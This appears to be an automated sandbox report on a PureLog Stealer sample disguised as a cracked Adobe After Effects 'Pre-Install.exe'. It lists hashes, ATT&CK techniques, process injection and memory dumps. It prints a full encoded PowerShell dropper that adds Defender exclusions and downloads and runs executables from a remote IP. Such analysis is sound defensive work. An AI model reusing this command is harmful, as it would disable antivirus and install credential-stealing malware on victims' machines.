purelogstealer | f183fe8f365d461bfa6c2d5603f37bb2da5b57393847486df99785df6f888195

Analysis

max time kernel
149s
max time network
154s
platform
windows10-2004_x64
resource
win10v2004-20240709-en
resource tags

arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system
submitted
23-07-2024 14:18

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Adobe After Effects 2024 24.0.3.2 (x64) + Patch/Adobe After Effects 2024 24.0.3.2 (x64) + Patch/Pre-Install.exe
Size

821KB
MD5

65c8e1071be3b9798f3cc3be165d97bb
SHA1

b270b466cc0f6baf7c75ea386eaca8ce17a70238
SHA256

e135035e26c55a2662f65f6bbf23b5c2a3c2736a81f434b00b05b0d15aeb4ace
SHA512

a6aac5a8db552db4db1428859638747e9205f04aae70238c07f008028b8ed35e9529fa4afafaa90163adf7e274f7e5f701d205a34f6873b8f8d8e5a68193158d
SSDEEP

12288:SzjjGKZL+ZU53YeWzZl7Vqx6ebZeB9sus42U2W9aCEBb:83+ZUitlxqxjZeBotM9aV

Score

10^/10

purelogstealer execution stealer

Malware Config

Signatures

PureLog Stealer
PureLog Stealer is an infostealer written in C#.
stealer purelogstealer

PureLog Stealer payload 1 IoCs

resource	yara_rule
behavioral2/memory/696-3-0x0000000004E60000-0x0000000004EAE000-memory.dmp	family_purelog_stealer

Blocklisted process makes network request 2 IoCs

flow	pid	Process
24	3004	powershell.exe
39	3004	powershell.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3419463127-3903270268-2580331543-1000\Control Panel\International\Geo\Nation	Pre-Install.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 696 set thread context of 2052	696	Pre-Install.exe	87

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
3004	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
3004	powershell.exe
3004	powershell.exe
2644	powershell.exe
2644	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	696	Pre-Install.exe
Token: SeDebugPrivilege	3004	powershell.exe
Token: SeDebugPrivilege	2644	powershell.exe

Suspicious use of WriteProcessMemory 14 IoCs

description	pid	Process	procid_target
PID 696 wrote to memory of 2052	696	Pre-Install.exe	87
PID 696 wrote to memory of 2052	696	Pre-Install.exe	87
PID 696 wrote to memory of 2052	696	Pre-Install.exe	87
PID 696 wrote to memory of 2052	696	Pre-Install.exe	87
PID 696 wrote to memory of 2052	696	Pre-Install.exe	87
PID 696 wrote to memory of 2052	696	Pre-Install.exe	87
PID 696 wrote to memory of 2052	696	Pre-Install.exe	87
PID 696 wrote to memory of 2052	696	Pre-Install.exe	87
PID 2052 wrote to memory of 3004	2052	Pre-Install.exe	88
PID 2052 wrote to memory of 3004	2052	Pre-Install.exe	88
PID 2052 wrote to memory of 3004	2052	Pre-Install.exe	88
PID 3004 wrote to memory of 2644	3004	powershell.exe	90
PID 3004 wrote to memory of 2644	3004	powershell.exe	90
PID 3004 wrote to memory of 2644	3004	powershell.exe	90

C:\Users\Admin\AppData\Local\Temp\Adobe After Effects 2024 24.0.3.2 (x64) + Patch\Adobe After Effects 2024 24.0.3.2 (x64) + Patch\Pre-Install.exe
"C:\Users\Admin\AppData\Local\Temp\Adobe After Effects 2024 24.0.3.2 (x64) + Patch\Adobe After Effects 2024 24.0.3.2 (x64) + Patch\Pre-Install.exe"
1⤵
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:696
- C:\Users\Admin\AppData\Local\Temp\Adobe After Effects 2024 24.0.3.2 (x64) + Patch\Adobe After Effects 2024 24.0.3.2 (x64) + Patch\Pre-Install.exe
  "C:\Users\Admin\AppData\Local\Temp\Adobe After Effects 2024 24.0.3.2 (x64) + Patch\Adobe After Effects 2024 24.0.3.2 (x64) + Patch\Pre-Install.exe"
  2⤵
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory
  PID:2052
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAbABnACMAPgBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAIgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHMAZQB3ACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUAByAGUAcABhAHIAYQB0AGkAbwBuACAAZABvAG4AZQAhACAATgBvAHcAIABnAG8AIAB0AG8AIABJAG4AcwB0AGEAbABsAC4AJwAsACcAJwAsACcATwBLACcALAAnAEkAbgBmAG8AcgBtAGEAdABpAG8AbgAnACkAPAAjAGoAbQBnACMAPgA7ACIAOwA8ACMAdgBuAGwAIwA+AFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0AUwBlAGMAbwBuAGQAcwAgADUAOwA8ACMAagBiAHcAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwB1AHAAeAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBkAHgAaQAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwByAGQAaAAjAD4AOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwADoALwAvADEANgAzAC4AMQAyADMALgAxADQAMgAuADEANwAxADoAOAAwADgAMAAvAGYAaQBsAGUALwAxADcAMAAxADUAMQA3ADUANAAzAC0AUwByAG4AcwBhAC4AZQB4AGUAJwAsACAAPAAjAG4AcQBkACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAYgBnAG4AIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAYQBzAHUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAUwByAG4AcwBhAC4AZQB4AGUAJwApACkAPAAjAHoAYwBsACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwAxADYAMwAuADEAMgAzAC4AMQA0ADIALgAxADcAMQA6ADgAMAA4ADAALwBmAGkAbABlAC8AMQA3ADAAMQA1ADEANwA2ADQAOQAtAGUAeABwAGwAbwByAGUAcgAuAGUAeABlACcALAAgADwAIwBsAHUAaQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAG0AaQBrACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAGMAaQBkACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAGUAeABwAGwAbwByAGUAcgAuAGUAeABlACcAKQApADwAIwB3AHYAbgAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBkAGsAeAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAdwB6AHcAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAUwByAG4AcwBhAC4AZQB4AGUAJwApADwAIwBqAGoAbAAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBzAGkAZwAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAcQB2AHUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAZQB4AHAAbABvAHIAZQByAC4AZQB4AGUAJwApADwAIwB4AGQAeQAjAD4A"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:3004
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-Type -AssemblyName System.Windows.Forms;<#sew#>[System.Windows.Forms.MessageBox]::Show('Preparation done! Now go to Install.','','OK','Information')<#jmg#>;
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2644

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Pre-Install.exe.log

Filesize
927B

MD5
4a911455784f74e368a4c2c7876d76f4

SHA1
a1700a0849ffb4f26671eb76da2489946b821c34

SHA256
264098e15b5b33d425f3b76e45b7976b58f917048125041135f7e60d8151108c

SHA512
4617591400409e1930195795a55e20d5f063042bb3e9fd1955099066e507b6ac8a1e3ae54cc42418e2639149b31bf7e58cd5743670d9030a15e29f14d813815d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
1KB

MD5
d584df872086c0f7442a664a33d38fe5

SHA1
f0fad100fda4e8bb82ce5bc7d03953605ac53a5d

SHA256
fdb68980ecdb4c9b464cc6a07ec410b2c7dda5b01240a0a8c860e9a94fe372bc

SHA512
5232ebc39075096fa6ae5ae6d5b7b4580003e0be87779281c27fc1e0646500c76ca2178205ccc06e3b85df02a3a88ddb864723a3978cc97a9d63fa07196cdd79

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
552B

MD5
066fd93d46c796eca8563c3730271ad7

SHA1
e25fa4bb33abe19986e7da107adec23fb8bc26b8

SHA256
fa6ecee86c893c3c20116e522144bc6e565348879b0fd76acf28210e8c9be0df

SHA512
cd6c85e72186213174ef9ab128824614cbcd212308a46f2eaad60d1e40fa41acb70dc335869a3012d9934e3ab4cc056bfe8b3702d6d3e05927d1eb703fb9205a

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_s1rqkkao.ayd.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/696-3-0x0000000004E60000-0x0000000004EAE000-memory.dmp

Filesize
312KB

Download
memory/696-13-0x00000000749A0000-0x0000000075150000-memory.dmp

Filesize
7.7MB

Download
memory/696-6-0x0000000004F00000-0x0000000004F36000-memory.dmp

Filesize
216KB

Download
memory/696-7-0x0000000004F40000-0x0000000004F8C000-memory.dmp

Filesize
304KB

Download
memory/696-8-0x0000000005590000-0x0000000005B34000-memory.dmp

Filesize
5.6MB

Download
memory/696-1-0x0000000000390000-0x0000000000464000-memory.dmp

Filesize
848KB

Download
memory/696-5-0x0000000004EB0000-0x0000000004EE6000-memory.dmp

Filesize
216KB

Download
memory/696-4-0x00000000749A0000-0x0000000075150000-memory.dmp

Filesize
7.7MB

Download
memory/696-2-0x0000000004E10000-0x0000000004E60000-memory.dmp

Filesize
320KB

Download
memory/696-0-0x00000000749AE000-0x00000000749AF000-memory.dmp

Filesize
4KB

Download
memory/2052-12-0x00000000749A0000-0x0000000075150000-memory.dmp

Filesize
7.7MB

Download
memory/2052-14-0x00000000749A0000-0x0000000075150000-memory.dmp

Filesize
7.7MB

Download
memory/2052-9-0x0000000000400000-0x0000000000434000-memory.dmp

Filesize
208KB

Download
memory/2644-46-0x0000000007870000-0x0000000007902000-memory.dmp

Filesize
584KB

Download
memory/3004-66-0x00000000079E0000-0x00000000079FA000-memory.dmp

Filesize
104KB

Download
memory/3004-60-0x00000000076C0000-0x00000000076DE000-memory.dmp

Filesize
120KB

Download
memory/3004-32-0x0000000005B50000-0x0000000005B9C000-memory.dmp

Filesize
304KB

Download
memory/3004-19-0x0000000004C60000-0x0000000004CC6000-memory.dmp

Filesize
408KB

Download
memory/3004-18-0x0000000004B40000-0x0000000004B62000-memory.dmp

Filesize
136KB

Download
memory/3004-17-0x0000000004CD0000-0x00000000052F8000-memory.dmp

Filesize
6.2MB

Download
memory/3004-33-0x0000000006AC0000-0x0000000006B56000-memory.dmp

Filesize
600KB

Download
memory/3004-35-0x0000000006070000-0x0000000006092000-memory.dmp

Filesize
136KB

Download
memory/3004-34-0x0000000006020000-0x000000000603A000-memory.dmp

Filesize
104KB

Download
memory/3004-36-0x0000000007D40000-0x00000000083BA000-memory.dmp

Filesize
6.5MB

Download
memory/3004-15-0x0000000074950000-0x00000000749FB000-memory.dmp

Filesize
684KB

Download
memory/3004-50-0x0000000070840000-0x000000007088C000-memory.dmp

Filesize
304KB

Download
memory/3004-49-0x00000000070D0000-0x0000000007102000-memory.dmp

Filesize
200KB

Download
memory/3004-20-0x00000000054B0000-0x0000000005516000-memory.dmp

Filesize
408KB

Download
memory/3004-61-0x00000000076E0000-0x0000000007783000-memory.dmp

Filesize
652KB

Download
memory/3004-62-0x00000000077E0000-0x00000000077EA000-memory.dmp

Filesize
40KB

Download
memory/3004-63-0x0000000007940000-0x0000000007951000-memory.dmp

Filesize
68KB

Download
memory/3004-64-0x0000000007990000-0x000000000799E000-memory.dmp

Filesize
56KB

Download
memory/3004-65-0x00000000079A0000-0x00000000079B4000-memory.dmp

Filesize
80KB

Download
memory/3004-31-0x0000000005B00000-0x0000000005B1E000-memory.dmp

Filesize
120KB

Download
memory/3004-67-0x00000000079D0000-0x00000000079D8000-memory.dmp

Filesize
32KB

Download
memory/3004-69-0x0000000074950000-0x00000000749FB000-memory.dmp

Filesize
684KB

Download
memory/3004-16-0x0000000002540000-0x0000000002576000-memory.dmp

Filesize
216KB

Download
memory/3004-30-0x0000000005620000-0x0000000005974000-memory.dmp

Filesize
3.3MB

Download
memory/3004-73-0x0000000074950000-0x00000000749FB000-memory.dmp

Filesize
684KB

Download